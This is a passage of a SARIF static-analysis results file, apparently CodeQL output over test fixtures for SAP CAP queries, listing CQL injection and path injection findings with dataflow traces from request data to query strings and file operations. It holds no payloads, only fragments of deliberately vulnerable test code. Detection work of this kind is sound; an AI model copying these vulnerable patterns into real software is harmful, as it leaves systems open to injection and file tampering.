value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":719,"startColumn":30,"endColumn":38}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":720,"startColumn":36,"endColumn":58}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":755,"startColumn":7,"endColumn":50}}}],"partialFingerprints":{"primaryLocationLineHash":"aa17f3fb0e89ad00:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":754,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":754,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":754,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":755,"startColumn":47,"endColumn":49}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":755,"startColumn":38,"endColumn":49}},"message":{"text":"\"ID =\" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":754,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":754,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":755,"startColumn":38,"endColumn":49}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":760,"startColumn":7,"endColumn":50}}}],"partialFingerprints":{"primaryLocationLineHash":"52425ca44df0fb9c:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":759,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":759,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":759,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":760,"startColumn":47,"endColumn":49}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":760,"startColumn":38,"endColumn":49}},"message":{"text":"`ID =` + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":759,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":759,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":760,"startColumn":38,"endColumn":49}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":765,"startColumn":7,"endColumn":51}}}],"partialFingerprints":{"primaryLocationLineHash":"abfa3b0ed80d2aef:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":764,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":764,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":764,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":765,"startColumn":46,"endColumn":48}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":765,"startColumn":38,"endColumn":50}},"message":{"text":"`ID = ${id}`"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":764,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":764,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":765,"startColumn":38,"endColumn":50}}}]},{"ruleId":"js/cap-path-injection","rule":{"id":"js/cap-path-injection","index":2,"toolComponent":{"index":8}},"message":{"text":"This CDS utils usage relies on user-provided value and can result in unrestricted file operations."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":22,"startColumn":36,"endColumn":42}}}],"partialFingerprints":{"primaryLocationLineHash":"d2d019c78ead4486:1","primaryLocationStartColumnFingerprint":"23"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":10,"startColumn":36,"endColumn":46}},"message":{"text":"req.params"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":10,"startColumn":19,"endColumn":33}},"message":{"text":"userinputthree"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":12,"startColumn":38,"endColumn":52}},"message":{"text":"userinputthree"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":12,"startColumn":28,"endColumn":53}},"message":{"text":"decodeU ... tthree)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":12,"startColumn":19,"endColumn":25}},"message":{"text":"taint1"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":22,"startColumn":36,"endColumn":42}},"message":{"text":"taint1"}}}]}]}],"relatedLocations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":10,"startColumn":36,"endColumn":46}}}]},{"ruleId":"js/cap-path-injection","rule":{"id":"js/cap-path-injection","index":2,"toolComponent":{"index":8}},"message":{"text":"This CDS utils usage relies on user-provided value and can result in unrestricted file operations."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":24,"startColumn":40,"endColumn":46}}}],"partialFingerprints":{"primaryLocationLineHash":"808bce90854ae867:1","primaryLocationStartColumnFingerprint":"27"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":10,"startColumn":36,"endColumn":46}},"message":{"text":"req.params"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":10,"startColumn":19,"endColumn":33}},"message":{"text":"userinputthree"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":14,"startColumn":47,"endColumn":61}},"message":{"text":"userinputthree"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":14,"startColumn":28,"endColumn":62}},"message":{"text":"decodeU ... tthree)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":14,"startColumn":19,"endColumn":25}},"message":{"text":"taint2"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":24,"startColumn":40,"endColumn":46}},"message":{"text":"taint2"}}}]}]}],"relatedLocations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":10,"startColumn":36,"endColumn":46}}}]},{"ruleId":"js/cap-path-injection","rule":{"id":"js/cap-path-injection","index":2,"toolComponent":{"index":8}},"message":{"text":"This CDS utils usage relies on user-provided value and can result in unrestricted file operations."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":26,"startColumn":34,"endColumn":40}}}],"partialFingerprints":{"primaryLocationLineHash":"afb5d6b9785b49d5:1","primaryLocationStartColumnFingerprint":"21"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":10,"startColumn":36,"endColumn":46}},"message":{"text":"req.params"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":10,"startColumn":19,"endColumn":33}},"message":{"text":"userinputthree"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":16,"startColumn":34,"endColumn":48}},"message":{"text":"userinputthree"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":16,"startColumn":28,"endColumn":49}},"message":{"text":"local(u ... tthree)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":16,"startColumn":19,"endColumn":25}},"message":{"text":"taint3"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":26,"startColumn":34,"endColumn":40}},"message":{"text":"taint3"}}}]}]}],"relatedLocations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":10,"startColumn":36,"endColumn":46}}}]},{"ruleId":"js/cap-path-injection","rule":{"id":"js/cap-path-injection","index":2,"toolComponent":{"index":8}},"message":{"text":"This CDS utils usage relies on user-provided value and can result in unrestricted file operations."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":28,"startColumn":34,"endColumn":40}}}],"partialFingerprints":{"primaryLocationLineHash":"bb2ecd3739649840:1","primaryLocationStartColumnFingerprint":"21"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":10,"startColumn":36,"endColumn":46}},"message":{"text":"req.params"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":10,"startColumn":19,"endColumn":33}},"message":{"text":"userinputthree"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":18,"startColumn":34,"endColumn":48}},"message":{"text":"userinputthree"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":18,"startColumn":28,"endColumn":49}},"message":{"text":"isdir(u ... tthree)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":18,"startColumn":19,"endColumn":25}},"message":{"text":"taint4"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":28,"startColumn":34,"endColumn":40}},"message":{"text":"taint4"}}}]}]}],"relatedLocations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":10,"startColumn":36,"endColumn":46}}}]},{"ruleId":"js/cap-path-injection","rule":{"id":"js/cap-path-injection","index":2,"toolComponent":{"index":8}},"message":{"text":"This CDS utils usage relies on user-provided value and can result in unrestricted file operations."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":30,"startColumn":40,"endColumn":46}}}],"partialFingerprints":{"primaryLocationLineHash":"63e729e91fdc10d2:1","primaryLocationStartColumnFingerprint":"27"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":10,"startColumn":36,"endColumn":46}},"message":{"text":"req.params"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":10,"startColumn":19,"endColumn":33}},"message":{"text":"userinputthree"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":20,"startColumn":35,"endColumn":49}},"message":{"text":"userinputthree"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":20,"startColumn":28,"endColumn":50}},"message":{"text":"isfile( ... tthree)"}},"taxa":[{"id":"Config","properties":{"CodeQL/DataflowRole":"step"}}]},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":20,"startColumn":19,"endColumn":25}},"message":{"text":"taint5"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":30,"startColumn":40,"endColumn":46}},"message":{"text":"taint5"}}}]}]}],"relatedLocations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":10,"startColumn":36,"endColumn":46}}}]},{"ruleId":"js/cap-path-injection","rule":{"id":"js/cap-path-injection","index":2,"toolComponent":{"index":8}},"message":{"text":"This CDS utils usage relies on user-provided value and can result in unrestricted file operations."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":31,"startColumn":26,"endColumn":35}}}],"partialFingerprints":{"primaryLocationLineHash":"84f3986f7255c726:1","primaryLocationStartColumnFingerprint":"13"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":19,"endColumn":28}},"message":{"text":"userinput"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":31,"startColumn":26,"endColumn":35}},"message":{"text":"userinput"}}}]}]}],"relatedLocations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}}}]},{"ruleId":"js/cap-path-injection","rule":{"id":"js/cap-path-injection","index":2,"toolComponent":{"index":8}},"message":{"text":"This CDS utils usage relies on user-provided value and can result in unrestricted file operations."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":33,"startColumn":38,"endColumn":47}}}],"partialFingerprints":{"primaryLocationLineHash":"7f1379ebf3dd2fef:1","primaryLocationStartColumnFingerprint":"25"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":19,"endColumn":28}},"message":{"text":"userinput"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":33,"startColumn":38,"endColumn":47}},"message":{"text":"userinput"}}}]}]}],"relatedLocations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}}}]},{"ruleId":"js/cap-path-injection","rule":{"id":"js/cap-path-injection","index":2,"toolComponent":{"index":8}},"message":{"text":"This CDS utils usage relies on user-provided value and can result in unrestricted file read."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":34,"startColumn":24,"endColumn":33}}}],"partialFingerprints":{"primaryLocationLineHash":"45cd294f7937b77e:1","primaryLocationStartColumnFingerprint":"11"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":19,"endColumn":28}},"message":{"text":"userinput"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":34,"startColumn":24,"endColumn":33}},"message":{"text":"userinput"}}}]}]}],"relatedLocations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}}}]},{"ruleId":"js/cap-path-injection","rule":{"id":"js/cap-path-injection","index":2,"toolComponent":{"index":8}},"message":{"text":"This CDS utils usage relies on user-provided value and can result in unrestricted file operations."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":36,"startColumn":44,"endColumn":53}}}],"partialFingerprints":{"primaryLocationLineHash":"15c5f129eb53b929:1","primaryLocationStartColumnFingerprint":"31"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":19,"endColumn":28}},"message":{"text":"userinput"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":36,"startColumn":44,"endColumn":53}},"message":{"text":"userinput"}}}]}]}],"relatedLocations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}}}]},{"ruleId":"js/cap-path-injection","rule":{"id":"js/cap-path-injection","index":2,"toolComponent":{"index":8}},"message":{"text":"This CDS utils usage relies on user-provided value and can result in tainted data being written to a file."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":37,"startColumn":25,"endColumn":37}}}],"partialFingerprints":{"primaryLocationLineHash":"f976670d2acc6fb9:1","primaryLocationStartColumnFingerprint":"12"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":9,"startColumn":34,"endColumn":45}},"message":{"text":"req.headers"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":9,"startColumn":19,"endColumn":31}},"message":{"text":"userinputtwo"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":37,"startColumn":25,"endColumn":37}},"message":{"text":"userinputtwo"}}}]}]}],"relatedLocations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":9,"startColumn":34,"endColumn":45}}}]},{"ruleId":"js/cap-path-injection","rule":{"id":"js/cap-path-injection","index":2,"toolComponent":{"index":8}},"message":{"text":"This CDS utils usage relies on user-provided value and can result in unrestricted file operations."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":38,"startColumn":25,"endColumn":34}}}],"partialFingerprints":{"primaryLocationLineHash":"7608589b7693ec5e:1","primaryLocationStartColumnFingerprint":"12"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":19,"endColumn":28}},"message":{"text":"userinput"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":38,"startColumn":25,"endColumn":34}},"message":{"text":"userinput"}}}]}]}],"relatedLocations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234},"region":{"startLine":8,"startColumn":31,"endColumn":39}}}]},{"ruleId":"js/cap-path-injection","rule":{"id":"js/cap-path-injection","index":2,"toolComponent":{"index":8}},"message":{"text":"This CDS utils usage relies on user-provided value and can result in unrestricted file 